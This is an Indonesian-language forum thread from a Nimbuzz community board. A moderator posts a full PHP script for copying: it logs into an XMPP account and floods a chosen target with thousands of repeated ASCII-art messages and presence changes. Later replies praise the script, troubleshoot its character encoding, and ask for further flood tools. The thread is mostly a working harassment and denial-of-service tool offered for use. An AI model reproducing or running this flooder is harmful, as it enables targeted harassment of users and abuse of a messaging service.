Gresik Community
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Gresik Community

Forume Arek-arek Nimbuzzer Gresik
 
IndeksHome pageLatest imagesPendaftaranLogin

 

 script flood pv message+presence

Go down 
3 posters
PengirimMessage
ghost_net
Moderator
Moderator
ghost_net


Jumlah posting : 46
Mulai Gabung : 24.08.11
Lokasi : riau

script flood pv message+presence Empty
PostSubyek: script flood pv message+presence   script flood pv message+presence Icon_minitimeFri Dec 09, 2011 11:01 am

silahkan dicopy. save as pv.php jgn lupa encoding UTF-8 biar supot nganu karakter. :D

Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<link rel="shortcut icon"href="http://ervan.mywapblog.com/files/icon.jpg">
<html>
<head>
<title>ghostnet-webflood</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<style type="text/css">
<!--
.style1 {color: #000000;font-weight: bold; font-size: 20px;}
.style5 {color: #000000;font-weight: bold; font-size: 15px;}
-->
</style>
</head>
<body bgcolor="#545454" text="#FFFFFF" leftmargin="0" topmargin="0">
<h2 align="center" class="style1">- TFT UNDERGROUND -</h2>
<center><img src="http://ervan.mywapblog.com/files/banner3.jpg"><center>
<p align="center" class="style5">PV FLOOD MESSAGE+PRESENCE</p>

<?php
if (!isset($_POST["Submit"]))
{
echo "<form id='ghost' name='send' method='post' action='$_SERVER[PHP_SELF]'>";
echo "<table width='400' border='0' cellspacing='1' cellpadding='1'>";

echo "<tr>";
echo "<td width='80'>username</td>";
echo "<td width='10'>:</td>";
echo "<td width='290'><input name='username' type='text' id='target' value='۰۰۰тhξ◊бг!м۰۰۰'/></td>";
echo "</tr>";

echo "<tr>";
echo "<td width=''>password</td>";
echo "<td width='10'>:</td>";
echo "<td width='290'><input name='password' type='text' id='target' value=''/></td>";
echo "</tr>";

echo "<tr>";
echo "<td>resource</td>";
echo "<td>:</td>";
echo "<td><input name='resource' type='text' id='resource' value='-τƒτ υηđęŕğŕουηđ-'/></td>";
echo "</tr>";

echo "<tr>";
echo "<td width=''>target id</td>";
echo "<td width='10'>:</td>";
echo "<td width='290'><input name='target' type='text' id='target' value=''/></td>";
echo "</tr>";

echo "<tr>";
echo "<td>timer</td>";
echo "<td>:</td>";
echo "<td><input name='timer' type='text' value='0'/></td>";
echo "</tr>";

echo "<tr>";
echo "<td>reload</td>";
echo "<td>:</td>";
echo "<td><input name='jumlah' type='text' value='5000'/></td>";
echo "</tr>";

echo "<tr>";
echo "<td>teks 1</td>";
echo "<td>:</td>";
echo "<td><textarea name='text' cols='30' rows='4' id='text'>,
░░▄██████████▄
░██████████████
██▀▀▀██████▀▀▀██
█▄ ░░ ▀██▀ ░░  ▄█
▐██▄▄▄▄██▄▄▄▄██▌
░  █████▐▌█████
  ▐████▄██▄██▌
░ ▀█▀████▀██▀
░░ ▐▄▼▼▼▼▄▌
░░░░▀█████▀

.</textarea></td>";
echo "</tr>";

echo "<tr>";
echo "<td>text 2</td>";
echo "<td>:</td>";
echo "<td><textarea name='text1' cols='30' rows='4' id='text1'>,
░░▄██████████▄
░██████████████
██▀▀▀██████▀▀▀██
█▄ ░░ ▀██▀ ░░  ▄█
▐██▄▄▄▄██▄▄▄▄██▌
░██████▐▌██████
  ▐████▄██▄███▌
░▀██▀██████▀█▀
░░ ▐  ▼▼▼▼▐
░░  ▐              ▌
░░  ▐▄▲▲▲▄▌
░░░░▀█████▀
.</textarea></td>";
echo "</tr>";

echo "<tr>";
echo "<td> </td>";
echo "<td> </td>";
echo "<td><input type='hidden' name='mode' value='ghost'></td>";
echo "</tr>";

echo "<tr>";
echo "<td> </td>";
echo "<td>&nbsp;</td>";
echo "<td><input type='submit' name='Submit' value='SEND' /></td>";
echo "</tr>";

echo "</table>";
echo "</form>";

}
else
{
$resource = $_POST['resource'];
$user = $_POST['username'];
$password = $_POST['password'];
$timer = $_POST['timer'];
$body1 = $_POST['text'];
$body2 = $_POST['text1'];
$target= $_POST['target'];
$target1="$target@nimbuzz.com";
$to="$target1";
$jumlah = $_POST['jumlah'];

include 'ghost.php';

for($gn=1;$gn<=$jumlah;$gn++)
{

$conn = new XMPPHP_XMPP('o.nimbuzz.com', '5222', $user, $password, $resource, 'nimbuzz.com', $printlog=false, $loglevel=XMPPHP_Log::LEVEL_INFO);
$conn->connect();
$conn->processUntil('session_start');

sleep($timer);
$conn->presence($status='□□□■ -LOADING- ■□□□','dnd');
$conn->presence($status='□□■□ -LOADING- □■□□','online');
$conn->presence($status='□■□□ -LOADING- □□■□','away');
$conn->presence($status='■□□□ -LOADING- □□□■','chat');
$conn->message($to, $body1,"chat");
$conn->message($to, $body2,"chat");
$conn->message($to, $body1,"chat");
$conn->message($to, $body2,"chat");
$conn->message($to, $body1,"chat");
$conn->message($to, $body2,"chat");
$conn->message($to, $body1,"chat");
$conn->message($to, $body2,"chat");
$conn->message($to, $body1,"chat");
$conn->message($to, $body2,"chat");
$conn->message($to, $body1,"chat");
$conn->message($to, $body2,"chat");
$conn->message($to, $body1,"chat");
$conn->message($to, $body2,"chat");
$conn->message($to, $body1,"chat");

$conn->disconnect();

}

echo "Flood to $to was sent. Reload this page for more flood";
}
?>

disini ane make include tunggal ghost.php. buat agan2 yg make include XMPPHP tnggal di ganti aja. slamat mncoba,yah..sesuatu (trend sahrini) :D
Kembali Ke Atas Go down
brewok
Member
Member



Jumlah posting : 11
Mulai Gabung : 01.11.11

script flood pv message+presence Empty
PostSubyek: Re: script flood pv message+presence   script flood pv message+presence Icon_minitimeFri Dec 09, 2011 5:12 pm

mantabb brayyy rok
Kembali Ke Atas Go down
brewok
Member
Member



Jumlah posting : 11
Mulai Gabung : 01.11.11

script flood pv message+presence Empty
PostSubyek: Re: script flood pv message+presence   script flood pv message+presence Icon_minitimeFri Dec 09, 2011 5:17 pm

di gb.ru ko klo php we ksh gambar karakter ko gk muncul y cuma tanda ???????? jadiny knp ya??
Kembali Ke Atas Go down
ghost_net
Moderator
Moderator
ghost_net


Jumlah posting : 46
Mulai Gabung : 24.08.11
Lokasi : riau

script flood pv message+presence Empty
PostSubyek: Re: script flood pv message+presence   script flood pv message+presence Icon_minitimeSun Dec 11, 2011 9:07 am

php encoding utf-8 udah dsmpan blm?
Kembali Ke Atas Go down
brewok
Member
Member



Jumlah posting : 11
Mulai Gabung : 01.11.11

script flood pv message+presence Empty
PostSubyek: Re: script flood pv message+presence   script flood pv message+presence Icon_minitimeMon Dec 12, 2011 4:13 pm

gan klo plud yg di cl kita ol nyampe bnyak bnget trs ntr off trs berulang-ulang itu plud ap yah??
Kembali Ke Atas Go down
ghost_net
Moderator
Moderator
ghost_net


Jumlah posting : 46
Mulai Gabung : 24.08.11
Lokasi : riau

script flood pv message+presence Empty
PostSubyek: Re: script flood pv message+presence   script flood pv message+presence Icon_minitimeMon Dec 12, 2011 6:30 pm

presence message gan,bsa jd make lbh dari 1 web atw 2,3 tab browser dengan resource yg brbeda
Kembali Ke Atas Go down
brewok
Member
Member



Jumlah posting : 11
Mulai Gabung : 01.11.11

script flood pv message+presence Empty
PostSubyek: Re: script flood pv message+presence   script flood pv message+presence Icon_minitimeMon Dec 12, 2011 11:01 pm

gan dikasih text panjang ko gk jln yah???
Kembali Ke Atas Go down
ghost_net
Moderator
Moderator
ghost_net


Jumlah posting : 46
Mulai Gabung : 24.08.11
Lokasi : riau

script flood pv message+presence Empty
PostSubyek: Re: script flood pv message+presence   script flood pv message+presence Icon_minitimeTue Dec 13, 2011 10:07 am

teks panjang yang gmana gan? isi pesan y? itu saya isi pesan lmyan panjang.jalan koq,tp kalo yg bner2 panjang saya blum pernah nyoba gan.. kan udah dilooping skripnya,jd body gak usah terllu panjang gan :D
Kembali Ke Atas Go down
kodok
Member
Member



Jumlah posting : 28
Mulai Gabung : 22.10.11

script flood pv message+presence Empty
PostSubyek: Re: script flood pv message+presence   script flood pv message+presence Icon_minitimeTue Dec 13, 2011 6:44 pm

mantapppppp,,,gan..
thx banyak gan.................salam sukses slalu agan ghost rok





brkutnya share flood add buat jabber gan Very Happy
Kembali Ke Atas Go down
ghost_net
Moderator
Moderator
ghost_net


Jumlah posting : 46
Mulai Gabung : 24.08.11
Lokasi : riau

script flood pv message+presence Empty
PostSubyek: Re: script flood pv message+presence   script flood pv message+presence Icon_minitimeSat Dec 17, 2011 5:14 pm

waduh,buat jabber ane blm prnah nyoba tu... silahkan otak atik aj gan :D
Kembali Ke Atas Go down
kodok
Member
Member



Jumlah posting : 28
Mulai Gabung : 22.10.11

script flood pv message+presence Empty
PostSubyek: Re: script flood pv message+presence   script flood pv message+presence Icon_minitimeTue Dec 20, 2011 2:56 pm

yg lagi anget gan flood call,,sayang w ga ngarti caranya gan..hehehe dash
Kembali Ke Atas Go down
ghost_net
Moderator
Moderator
ghost_net


Jumlah posting : 46
Mulai Gabung : 24.08.11
Lokasi : riau

script flood pv message+presence Empty
PostSubyek: Re: script flood pv message+presence   script flood pv message+presence Icon_minitimeThu Dec 22, 2011 6:58 pm

Agan kodok mank udah prnah jd korban? Itu rasanya gmna y? Saya jg pnasan,bru dngar c :lol:
Kembali Ke Atas Go down
kodok
Member
Member



Jumlah posting : 28
Mulai Gabung : 22.10.11

script flood pv message+presence Empty
PostSubyek: Re: script flood pv message+presence   script flood pv message+presence Icon_minitimeThu Dec 22, 2011 8:34 pm

rasanya berat gan,lw pk ory ada yg telpon gelap edan
Kembali Ke Atas Go down
ghost_net
Moderator
Moderator
ghost_net


Jumlah posting : 46
Mulai Gabung : 24.08.11
Lokasi : riau

script flood pv message+presence Empty
PostSubyek: Re: script flood pv message+presence   script flood pv message+presence Icon_minitimeWed Dec 28, 2011 1:42 am

owh gt...bsa jd yg ngrjain teman agan jg..itu skript keqnya bsa bwt nganu nope agan.. tp ga tau jg ya.. Yg tahu silahkan pncerahan.. :D
Kembali Ke Atas Go down
Sponsored content





script flood pv message+presence Empty
PostSubyek: Re: script flood pv message+presence   script flood pv message+presence Icon_minitime

Kembali Ke Atas Go down
 
script flood pv message+presence
Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
Gresik Community  :: Nimbuzz :: Trik & Kode-
Navigasi: